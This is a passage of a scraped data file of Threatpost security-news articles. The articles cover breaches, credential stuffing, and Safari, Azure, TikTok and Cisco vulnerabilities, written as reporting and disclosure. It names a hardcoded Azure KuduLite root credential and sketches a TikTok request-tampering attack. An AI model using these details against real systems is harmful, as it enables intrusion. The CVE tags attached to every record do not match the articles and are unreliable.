Imperva\u2019s production AWS accounts, thanks to a cloud misconfiguration. Hackers used Imperva\u2019s Cloud Web Application Firewall (WAF) product to access a database snapshot containing emails, hashed and salted passwords, and some customers\u2019 API keys and TLS keys. Because the database [was accessed as a snapshot](<https://threatpost.com/imperva-data-breach-cloud-misconfiguration/149127/>), the hackers made off with only old Incapsula records that go up to Sept. 15, 2017. However, the theft of API keys and SSL would allow an attacker to break companies\u2019 encryption and access corporate applications directly.\n\n * [](<https://threatpost.com/att-verizon-subscribers-exposed-mobile-bills/150867/> \"Sprint draft\" )\n\n**Sprint Contractor Lays Open Phone Bills for 260K Subscribers**\n\nA cloud misconfig was also behind hundreds of thousands of mobile phone bills for AT&amp;T, Verizon and T-Mobile subscribers [being exposed](<https://kasperskycontenthub.com/threatpost-global/wawa-data-breach-malware-stole-customer-payment-card-info/151337/>) to the open internet in December, thanks to the oversight of a contractor working with Sprint. More than 261,300 documents were stored \u2013 mainly cell phone bills from Sprint customers who switched from other carriers. Cell phone bills are a treasure trove of data, and include names, addresses and phone numbers along with spending histories and in many cases, call and text message records.\n\n * [](<https://threatpost.com/magecart-infestations-saturate-web/148911/> \"Magecart\" )\n\n**Magecart Siphons Off Millions of Payment Card Details**\n\nMagecart, the digital card-skimming collective encompassing several different affiliates all using the same modus operandi, is now so ubiquitous that its infrastructure is [flooding the internet](<https://threatpost.com/magecart-infestations-saturate-web/148911/>), researchers said earlier this year. Magecart attacks, which involve inserting virtual credit-card skimmers into e-commerce check-out pages, affected a range of companies throughout 2019; these included [bedding retailers](<https://threatpost.com/magecart-mypillow-emerisleep-attack/143022/>) MyPillow and Amerisleep, the subscription website for the [Forbes print magazine](<https://threatpost.com/magecart-card-skimmer-forbes/144811/>), at least [80 reputable brands](<https://threatpost.com/magecart-ecommerce-card-skimming-bonanza/147765/>) in the motorsports industry and luxury apparel segments, popular skin care brand First Aid Beauty, [Macy\u2019s](<https://threatpost.com/magecart-attack-skin-care-site/149580/>) and streaming video and podcast content company [Rooster Teeth](<https://threatpost.com/rooster-teeth-attack-magecart/151216/>).\n\n * [](<https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/> \"equifax\" )\n\n**Equifax Settlement Rankles Consumers**\n\nEquifax made notable news this year when it agreed to pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers. That includes $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties. Some consumers are furious over what they view as an unfair settlement though, with 200,000 of them signing a petition against the deal. The petition argues that very little of that cash will trickle down to those who actually suffered because of the breach.\n\n\n", "cvss3": {}, "published": "2019-12-26T14:00:09", "type": "threatpost", "title": "Top 10 Breaches and Leaky Server Screw Ups of 2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-12-26T14:00:09", "id": "THREATPOST:5411DD62D790E8DA914441FC7BFE1358", "href": "https://threatpost.com/top-10-breaches-leaky-server-2019/151386/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:14:51", "description": "A security researcher disclosed details of an Apple Safari web browser security hole that could leak files with other browsers and applications and open the door to exploitation by attackers. The disclosure came only after Apple said it would delay patching the vulnerability for nearly a year. For context, researcher rated the bug as \u201cnot very serious\u201d.\n\nPolish security researcher [Pawel Wylecial](<https://www.blogger.com/profile/10114474176396848494>), co-founder of [REDTEAM.PL](<https://blog.redteam.pl/>) unveiled the flaw. He attributed the bug to Safari\u2019s implementation of the [Web Share API](<https://w3c.github.io/web-share/>), according to a [blog post](<https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html>) outlining his finding on Monday. The API, which is relatively new, allows users to share links from the browser via third-party applications, such as those distributed via mail and messaging apps.\n\nThe problem lies in that the implementation\u2019s _file: __ scheme_ on both the mobile and desktop versions of Safari which allows access to files stored on the user\u2019s local hard drive. This can lead to someone unknowingly sharing personal files or data with a malicious site when assuming they are only sharing an article or link with their friends, Wylecial wrote.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe problem is that _file: scheme_ is allowed, and when a website points to such URL unexpected behavior occurs,\u201d Wylecial explained in his post. \u201cIn case such a link is passed to the navigator.share function an actual file from the user file system is included in the shared message, which leads to local file disclosure when a user is sharing it unknowingly.\u201d\n\nWylecial acknowledged that the \u201cproblem is not very serious\u201d because it requires a user to take action rather than allowing an attacker to remotely control someone\u2019s system without their knowledge.\n\nHowever, he said it\u2019s not difficult to make the shared file invisible to the user, comparing the capability the flaw gives an attacker to clickjacking in the way it aims \u201cto convince the unsuspecting user to perform some action,\u201d he said.\n\nThat the bug is not super-serious may not be the point, however. Wylecial\u2019s disclosure once again highlight\u2019s Apple\u2019s [lackluster approach](<https://threatpost.com/google-bug-hunter-urges-apple-to-change-its-ios-security-culture/134842/>) to patching vulnerabilities discovered by third-party researchers as well as a [historically chilly relationship](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>) with them.\n\nWylecial reported the bug to Apple on April 17 of this year, with the company acknowledging four days later that they received his report. After much back and forth, earlier this month Apple said it would address the issue in the Spring 2021 update to Safari, which would be nearly a year after the issue was reported.\n\nThis prompted Wylecial to reveal his research, he said. The researcher said he told Apple \u201cthat waiting with the disclosure for almost an additional year, while four months already have passed since reporting the issue, is not reasonable.\u201d He then went public with his research.\n\nIndeed, the disclosure shows the ongoing tension between Apple and security researchers, which many thought was on its way to being solved when the company finally [opened its bug bounty program to the public](<https://threatpost.com/apples-bug-bounty-opens-1m-payout/151334/>) in December 2019, a move announced four months before [at Black Hat in August](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>).\n\nThe revamped public program boosted payouts and expanded the platform playing field for researchers over the previous program, which was invite-only with rewards only as high as $200,000 on limited platforms. Now researchers can receive up to $1 million for the most critical of zero-day flaws on its latest hardware, and between $25,000 to $500,000 for discovering vulnerabilities in range of other products, including Macs, iPhone and iPad, and Apple TV.\n\nEven after the changes, however, some notable researchers, including Google\u2019s Project Zero Ian Beer\u2014known for discovering a number of [zero-day iOS flaws](<https://threatpost.com/iphone-zero-days-watering-hole-attacks/147891/>)\u2013balked at participating in the Apple bug bounty program.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. [Resister today](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) for this **FREE **Threatpost webinar \u201c**[Five Essentials for Running a Successful Bug Bounty Program](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)**\u201c.** **Hear from top **Bug Bounty Program experts** how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. **Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) webinar.**\n", "cvss3": {}, "published": "2020-08-25T15:28:20", "type": "threatpost", "title": "Safari Bug Revealed After Apple Takes Nearly a Year to Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-25T15:28:20", "id": "THREATPOST:00F7DE33B40C4ED287762FBA680EB607", "href": "https://threatpost.com/safari-bug-revealed-after-apple-takes-nearly-a-year-to-patch/158612/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:35:47", "description": "Cybercriminals continue to firehose financial services companies with new and innovative cyberattacks. Research from Akamai recently found that up to 75 percent of all credential abuse attacks against the financial services industry in 2019 targeted APIs directly (rather than user-facing login pages). One such credential stuffing attack, observed last summer, hit one of Akamai\u2019s financial services customers with a blizzard of 55 million malicious login attempts.\n\n\u201cWe talk about API attacks and the reason why criminals are using targeted methods against API because the traditional \u2018throw it and hope it sticks\u2019 against financial services just isn\u2019t cutting it anymore, they have to be more creative,\u201d Steve Ragan, security researcher with Akamai, told Threatpost. \u201cAnd of course this creates this \u2018run and gun\u2019 type of situation to where the financial services industry has to keep adding more layers and getting more creative with how they\u2019re doing defense because the criminals are obviously coming at them full steam ahead.\u201d\n\nThreatpost talks to Ragan about the hardest hitting attack threats against the financial services industry, including credential stuffing attacks, DDoS attacks and more.\n\n_A lightly edited transcript is below._\n\n**Lindsey O\u2019Donnell-Welch**: Hi, everyone, this is Lindsey O\u2019Donnell-Welch with Threatpost and I\u2019m here at RSA Conference in San Francisco, joined by Steve Ragan with Akamai. Steve, thanks so much for joining us.\n\n**Steve Ragan:** Thanks for having me.\n\n**LO: **How\u2019s your conference going, so far?\n\n**SR:** So far, it\u2019s going good. had a lot of productive meetings this week. It\u2019s been a very long week. And it\u2019s only Wednesday.\n\n**LO:** Right yeah. Yeah, so I wanted to talk a little bit about, Akamai recently published a research paper last Wednesday. And it was discussing some really interesting takeaways about the state of internet security and how that impacts financial services. And there were some really good points in the research about kind of DDoS attacks and how that impacts financial services as well as credential stuffing and APIs. So just to start, can you talk about some of the biggest takeaways that you had in terms of what the research was about.\n\n**SR: **So the big one of the biggest takeaways I got from the report when I was researching it, is the fact that, the last time we wrote about financial services, I had mentioned that the criminals were steadily targeting them, and they weren\u2019t slowing down anytime soon. As this report was being put together, not only did that get proven true, it actually got bigger. So shortly after we put out the last financial services report, we actually saw a record setting attack for us, one of the largest against FinServ that we\u2019d seen since we started tracking this, upwards of like 55 million credential stuffing attempts. And then as we started sorting and sifting through the data, we noticed that, like you had mentioned, DDoS, when it comes to unique DDoS targets, 40 percent of those were in the financial services sector, which is significant. We saw a bump in targeted API attacks for credential stuffing against the FinServ sector and then also local file inclusion jumped up ahead of SQL injection when it comes to the type of web attacks we\u2019re seeing against financial services. So there are a couple of things that stood out in this report. But the the big key takeaway is that criminals are still actively engaged and targeting financial services.\n\n**LO:** Right. And I want to kind of delve into those separate types of attacks and attack vectors in a second. But maybe we should take a step back and look at financial services as a whole and kind of what the main security issues are with the industry. Can you kind of give an outline of financial services and where they are and where the industry is at this point about these attacks.\n\n**SR:** So it\u2019s, it\u2019s really interesting Financial Services is usually the industry that\u2019s always at the top of their game when it comes to security, which forces the criminals to get creative in their attacks, they have to be hyper focused. So part of this report, we talk about API attacks and the reason why criminals are using targeted methods against API because the traditional \u201cthrow it and hope it sticks\u201d against financial services just isn\u2019t cutting it anymore, they have to be more creative. And of course this creates like this this run and gun type of situation to where the financial services industry has to keep adding more layers and getting more creative with how they\u2019re doing defense because the criminals are obviously coming at them full steam ahead. You see a lot of the same problems in financial services as you do with any other market segment. So the old standbys are still there. Web attacks are always going to have SQL injection, you\u2019re going to see that, you\u2019re going to see DDoS as a distraction and as a way to cut vital services off from customers. You\u2019re going to see this no matter what industry you\u2019re looking at. But when it comes to financial services, what we\u2019ve noticed is, criminals tend to take a hybrid approach in their attacks. So you\u2019ll see attacks that leverage SQL injection attempts versus a little bit of DDoS mixed in there. And then when you see DDoS, the way they launch these attacks, it\u2019s a myriad of attempts. So you\u2019ll see SYN flooding, you\u2019ll see RTSP you\u2019ll see all of that mixed in, so it goes across the board.\n\n**LO:** Well, that\u2019s what kind of stuck out to me about kind of the DDoS attacks that you guys were observing was just the variation in different methods that were being used. And so, what do you see, what\u2019s kind of the overall trends that you\u2019re seeing with DDoS attacks in targeting the financial industry?\n\n**SR:** We\u2019re seeing sustained attacks. So what I mean by this is, they get bigger and they last longer. So we\u2019re seeing you know, FinServ companies and I say FinServ, but I mean financial services, right I get that jargon stuck in my head, it doesn\u2019t go anywhere. But we\u2019re seeing these attacks stay longer, and they keep variations going so they don\u2019t stick to just one type of DDoS attack anymore. They\u2019re layering them throughout. And they just keep going, until eventually they just fall off. We\u2019ve noticed that if you look in the report, we look at the peaks of traffic. And sometimes when we see these, these records setting, and I say record setting, meaning just like it stands out in the report, but when you see these attacks, it\u2019s FinServ that\u2019s getting hit, it\u2019s getting hit the hardest in some ways.\n\n**LO:** Yeah. And I mean, to your point about DDoS attacks that are targeting FinServ of getting getting bigger and bigger. I think that\u2019s a trend we\u2019re seeing overall, too, with DDoS attacks, growing and getting more widespread.\n\n**SR:** You don\u2019t hear about DDoS a lot. And that\u2019s one of the things we\u2019re trying to correct because we want to we want people to realize DDoS attacks are very real, they happen and they\u2019re not going away anytime soon. So it\u2019s it\u2019s a thing that we want to keep that awareness out there, which is why we included it in this report because it needs to be talked about, because a lot of times you\u2019ll see DDoS used as a precursor or a backer to other types of attacks. So, you know, trying to focus on just one one vector or one aspect of your attack surface does you no good.\n\n**LO: **Right. And I also wanted to ask about credential stuffing, that was another big part of the report and you know, that figure you mentioned earlier about, was it 55 million \u2013\n\n**SR: **55 million was the the attack shortly after we put out the last report. And it was all credential stuffing. And it was against a financial services company. So this, this particular attack, this was a 24 hour period, and it just stands out because this proves that, when it comes comes to how criminals are leveraging credential stuffing, they\u2019re laser focused. And so they really really really want to get as much as they can out of these combination lists that they\u2019re using, because they only have a short shelf life. So they wanted, they hit as much as they can for as long as they can. And then they swap out the list and keep going. And we\u2019ve seen that a lot over the last couple of years to where these lists. They use them everywhere.\n\n**LO:** Yeah, I mean, well, when you look at also kind of the financial services industry, I think that you had mentioned that they\u2019re still using usernames and passwords. And I think that there needs to be a rethink of authentication.\n\n**SR:** Oh, yeah, I agree. I really like that, you know, the financial services industry is getting more and more in tune with multi-factor authentication, and they\u2019re not just relying on usernames and passwords anymore, they\u2019re adding more to it, which is good for the public. It\u2019s good for them. I mean, it works all around, but unfortunately, not everybody does that. And that\u2019s why you see credential stuffing taking off because the criminals know that in some cases, all they needs a user name and password, right. And so they go from there. It\u2019s not just financial services where we\u2019re seeing this. We\u2019re seeing this in other sectors as well, travel and hospitality, tt\u2019s a thing we\u2019re looking at. Gaming is another industry that\u2019s seeing a lot of credential abuse. So right, it\u2019s moving around.\n\n**LO:** Yeah, that seems like a big problem, just across the industry as a whole. But when you look ahead to 2020, between, you know, all the different types of threats that you were seeing in your report, do you think one is going to kind of stand out whether it\u2019s kind of APIs being targeted?\n\n**SR:** We\u2019re going to see more targeted API\u2019s, you\u2019re going to see that go up, I think and I think we\u2019re also going to see more focus on credential stuffing as the year goes on. I think credential abuse is because of its point and click nature and it\u2019s low barrier of entry for criminals, everybody\u2019s jumping on it. Right now when do my research to look at what groups are doing and how they\u2019re doing it, credential stuffing is the top that they\u2019re going for. Because there are automated tools that literally, you load up your list you point at a domain, and you go. And it\u2019s it\u2019s very noisy. So they these types of attacks stand out on a network, which is why we\u2019re able to track them like we do. But unfortunately, they\u2019re effective, which is why you see them so much.\n\n**LO:** Right, unfortunately.\n\n**SR:** Unfortunately, they are effective.\n\n**LO:** Yeah. I also wanted to ask, before we wrap up, when you are looking at the financial services industry, what advice would you have in terms of best steps for protection or mitigation against these types of attacks?\n\n**SR: **So the biggest complaint I see criminals talk about is multi factor authentication. So not only enabling that but enforcing it, would be one of the things I would encourage financial services or any industry really, you know, start using multi factor authentication, enforce it. Don\u2019t make it to where, oh, it\u2019s there if you want to use it, teach your your user base, how to use this teach them, why it\u2019s important. So education, and more options, I think, would be a good run of the mill. When it comes to API attacks, I would suggest keeping an eye on threading and keeping an eye on rate limiting. Don\u2019t let somebody make a half a million attempts against your API, track that stuff.\n\n**LO:** Yeah.\n\n**SR:** And unfortunately, visibility in the API space is not as large as it is in some of the other attack surfaces that companies experience. So that needs to be, you need more visibility.\n\n**LO:** Well, good things to think about when we\u2019re moving forward. So Steve, thank you so much for speaking with us and have a great rest of your show.\n\n**SR:** Thanks.\n", "cvss3": {}, "published": "2020-03-12T13:57:20", "type": "threatpost", "title": "Akamai Talks Massive Uptick in Credential-Stuffing Attacks Against Bank APIs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-12T13:57:20", "id": "THREATPOST:0C6C445BFBCD8AD47CA5B91A506DB09E", "href": "https://threatpost.com/akamai-on-credential-stuffing-attacks/153654/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:08", "description": "A major Microsoft crypto-spoofing bug impacting Windows 10 [made waves this Patch Tuesday](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>), particularly as the flaw was found and reported by the U.S. National Security Agency (NSA).\n\nMicrosoft\u2019s January Patch Tuesday security bulletin disclosed the \u201cimportant\u201d-severity vulnerability, which could allow an attacker to spoof a code-signing certificate, vital to validating executable programs in Windows, and make it appear as if an application was from a trusted source.\n\nThreatpost talked to Pratik Savla, senior security engineer at Venafi, about the vulnerability, whether the hype around the flaw was warranted, and what the disclosure means for the NSA.\n\n[**For direct download click here.**](<http://traffic.libsyn.com/digitalunderground/Patch_Tuesday.mp3>)\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/12754238/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-01-15T20:47:18", "type": "threatpost", "title": "Podcast: NSA Reports Major Crypto-Spoofing Bug to Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-15T20:47:18", "id": "THREATPOST:4F15F64975E3F5BE228AE0A72697EE31", "href": "https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:18:37", "description": "Researchers have disclosed two flaws in Microsoft\u2019s Azure web hosting application service, App Services, which if exploited could enable an attacker to take over administrative servers.\n\nAzure App Services is an HTTP-based service for hosting web applications, and is available in both Microsoft Azure Cloud and on-premise installations. Researchers found two vulnerabilities in the cloud service that specifically affect Linux servers.\n\n\u201cThe two vulnerabilities we found allow us to combine them and enable any attacker with the ability to forge post requests (SSRF) or [remote] code execution on an Azure App Service to take over the Azure App Service administration server,\u201d said Paul Litvak, [researcher with Intezer, in a Thursday post](<https://www.intezer.com/blog/cloud-security/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/>).\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nBoth flaws were discovered three months ago and reported to Microsoft. Microsoft has since issued a fix. The vulnerabilities do not have CVE assignments.\n\n## KuduLite Bugs\n\nThe first flaw stems from an open-source project called KuduLite within Azure App Services. This Linux project manages the administration page that\u2019s used to register admins into the App Service Plan (to start using App Services a user must first create an App Service Plan).\n\nAfter discovering that the KuduLite instance\u2019s SSH service uses hardcoded credentials \u201croot:Docker!\u201d to access the application node, researchers were able to log in as root.\n\n\u201cAs a reminder, the developers of the App Service KuduLite made sure admins were only able to log into it as a low privileged user, so we knew this was unintended.\u201d\n\nAfter taking control of the KuduLite instance, researchers could then gain control over the Software Configuration Management (SCM) web server, which systematically manages and controls changes in the documents and codes during the Software Development Life Cycle. This allowed them to then listen to a user\u2019s HTTP requests to the SCM web page, add their own pages and inject malicious Javascript into the user\u2019s web page.\n\n\u201cThe user may also choose to let App Services manage the git server, in which case the server will be managed by KuduLite,\u201d said researchers. \u201cThe attacker could then add malicious code to the repository to achieve persistence and spread to other instances using the same git server.\u201d\n\nThe second flaw exists in the KuduLite API. The issue here stems from the application node being able to send requests to the KuduLite API sans access validation \u2013 an error that is especially problematic when considering a web app with an SSRF vulnerability, researchers said.\n\n\u201cAn attacker who manages to forge a GET request may access the application node\u2019s file system via the KuduLite \u200bVFS API,\u201d said researchers. \u201cThis would enable an attacker to easily steal source code and other assets on the application node.\u201d\n\nAn attacker who manages to forge a POST request, meanwhile, may achieve remote code execution on the application node via the \u200bcommand API\u200b, they said. And, in Windows (where Kudu is used), packets sent from the application node to the manager node are dropped.\n\nThese two vulnerabilities can be chained together, since once an attacker achieves code execution with the second vulnerability, they can then exploit the first one. One potential attack vector here is for an attacker to use this flaw to implant a phishing page in what\u2019s supposed to be the SCM web page (as seen in the video below).\n\nResearchers stressed that [cloud security is still relatively new](<https://threatpost.com/category/cloud-security/>), making it essential to research and document new attack surfaces that arise when using these services.\n\n\u201cAs a general best practice, runtime cloud security is an important last line of defense and one of the first actions you can to reduce risk, since it can detect malicious code injections and other in-memory threats that take place after a vulnerability has been exploited by an attacker,\u201d they said.\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n\nWrite a comment\n\n**Share this article:**\n\n * [Cloud Security](<https://threatpost.com/category/cloud-security/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-10-08T15:28:37", "type": "threatpost", "title": "Microsoft Azure Flaws Open Admin Servers to Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-10-08T15:28:37", "id": "THREATPOST:DBAD84DFBF09E2C28414A18721E5CA90", "href": "https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:38", "description": "Researchers say they have discovered several major vulnerabilities in the short form video app TikTok. The reported vulnerabilities come as [scrutiny](<https://threatpost.com/tiktok-banned-by-u-s-army-over-china-security-concerns/151480/>) around the Chinese-owned platform increases.\n\nResearchers say the most serious vulnerability in the platform could allow attackers to remotely take control over parts of victims\u2019 TikTok account, such as uploading or deleting videos and changing settings on videos to make \u201chidden\u201d videos public. Researchers also discovered a separate vulnerability that allowed them to obtain personal data of victims, such as email addresses and more.\n\n\u201cMany of us use the TikTok app to share enjoyable moments and snip bits of fun memories in the form of a short video clips,\u201d researchers with Check Point Research [said on Wednesday](<https://research.checkpoint.com/2020/tik-or-tok-is-tiktok-secure-enough/>). \u201cBut as some have experienced, there is often a fine line between fun clips to private, even intimate assets being compromised while trusting to be under the protection from the apps we use.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nTikTok, a social media app with over 1.3 billion installs worldwide, is owned by Beijing-based parent company ByteDance. The app\u2019s parent company, ByteDance, was notified in November of the flaws and fixed the issue on Dec. 15, researchers said.\n\nThe first vulnerability allowed partial account takeover via SMS link spoofing. Researchers were able to spoof a TikTok SMS link that invites users to download the application.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/08085959/tikT-image-6.jpg>)\n\nA potential attacker could send an SMS invite message to a victim by capturing the HTTP request with a proxy tool (such as Burp Suite), inputting the victim\u2019s phone number into the \u201cMobile\u201d parameter, and changing the \u201cdownload_url\u201d parameter into a malicious URL of their choosing. The victim would then be sent a legitimate message from TikTok asking them to download the app, with a link to the attacker-controlled malicious domain.\n\nThis opens the victim up to an array of attacks, researchers said. \u201cWe found that it is possible to send a malicious link to a victim that will result in redirecting the victim to a malicious website. The redirection opens the possibility of accomplishing Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) and Sensitive Data Exposure attacks without user consent,\u201d they wrote.\n\nResearchers found that they could take this attack a step further and send requests on behalf of the user after the victim has opened the URL \u2013 enabling them to take over parts of victims\u2019 accounts.\n\n\u201cWith the lack of anti-Cross-Site request forgery mechanism, we realized that we could execute JavaScript code and perform actions on behalf of the victim, without his/her consent,\u201d researchers said.\n\nFinally, researchers said that once they had partial control over victims\u2019 accounts, they were able to make several API calls (in the https://api-t[.]tiktok[.]com and https://api-m[.]tiktok[.]com subdomains), which would then reveal sensitive information about the victim including email address, payment information and birthdates.\n\n\u201cTikTok is committed to protecting user data. Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us,\u201d a TikTok spokesperson said in a media statement. \u201cBefore public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.\u201d\n\nThe security flaws come as backlash [swells around TikTok\u2019s relationship with China](<https://threatpost.com/tiktok-banned-by-u-s-army-over-china-security-concerns/151480/>), leading the United States Army this week to announce that U.S. soldiers can no longer have the social media app on government-owned phones.\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-08T14:30:42", "type": "threatpost", "title": "TikTok Riddled With Security Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-08T14:30:42", "id": "THREATPOST:F45A1AEACEC0BF32FC6CDCECDF2B458D", "href": "https://threatpost.com/tiktok-riddled-with-security-flaws/151616/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:27", "description": "Cisco Systems has fixed two high-severity vulnerabilities in its products, including one in its popular Webex video conferencing platform that could enable a remote attacker to execute commands.\n\nThe high-severity Webex flaw exists in the web-based management interface of Cisco Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing, to enhance audio, video and content.\n\n\u201cA successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system with root privileges on a targeted node,\u201d according to Cisco\u2019s [security advisory, released this week](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200108-webex-video>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile attackers can exploit the flaws remotely, they would need to be authenticated, according to the advisory; meaning they would first need to log into the web-based management interface with administrative privileges and then supply crafted requests to the application. The web-based management Webex interface does not properly validate these crafted requests, enabling attackers to execute arbitrary commands.\n\nThe vulnerability affects Cisco Webex Video Mesh Software releases earlier than 2019.09.19.1956m (the fixed version). The flaw, found during internal security testing, has a CVSS score of 7.2 out of 10, making it high-severity. Cisco said that it is not aware of any exploits against the flaw in the wild.\n\nThe networking giant on Wednesday also released fixes for another high-severity glitch in the web user interface of Cisco IOS and Cisco IOS XE Software. IOS XE, a Linux-based version of Cisco\u2019s Internetworking Operating System (IOS), is software that powers Cisco routers and switches. Products supported by IOS XE include enterprise switches (including Cisco\u2019s Catalyst series), branch routers and edge routers including ASR 1013.\n\nThe vulnerability could enable an unauthenticated, remote attacker to launch a cross-site request forgery (CSRF) attack on affected systems. CSRF attacks, typically launched via emails that use social engineering, trick victims into clicking specially-crafted links that then send a forged request to a server.\n\nThe vulnerability stems from \u201cinsufficient CSRF protections for the web UI on an affected device,\u201d according to Cisco. An attacker could first exploit the flaw by persuading a user to follow a malicious link.\n\nThen, \u201ca successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the targeted user,\u201d according to [Cisco\u2019s advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200108-ios-csrf>). \u201cIf the user has administrative privileges, the attacker could alter the configuration, execute commands or reload an affected device.\u201d\n\nThe flaw, discovered by Mehmet \u00d6nder Key, affects Cisco devices that are running vulnerable releases of Cisco IOS or Cisco IOS XE Software earlier than 16.1.1 with the HTTP Server feature enabled. Cisco said that it is not aware of any exploits in the wild against the flaw, which ranks 8.8 out of 10 on the CVSS scale.\n\n[Cisco overall on Wednesday](<https://tools.cisco.com/security/center/publicationListing.x>) issued 14 patches for flaws across its products, including 12 medium-severity flaws and two high-severity flaws. Last week, the company [issued patches for three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) impacting a key tool for managing its network platform and switches. Those bugs could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices, the company said.\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._** [_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-10T17:24:29", "type": "threatpost", "title": "Cisco Webex Bug Allows Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-10T17:24:29", "id": "THREATPOST:0675FD2F1907119072EAFF965E2B7E2C", "href": 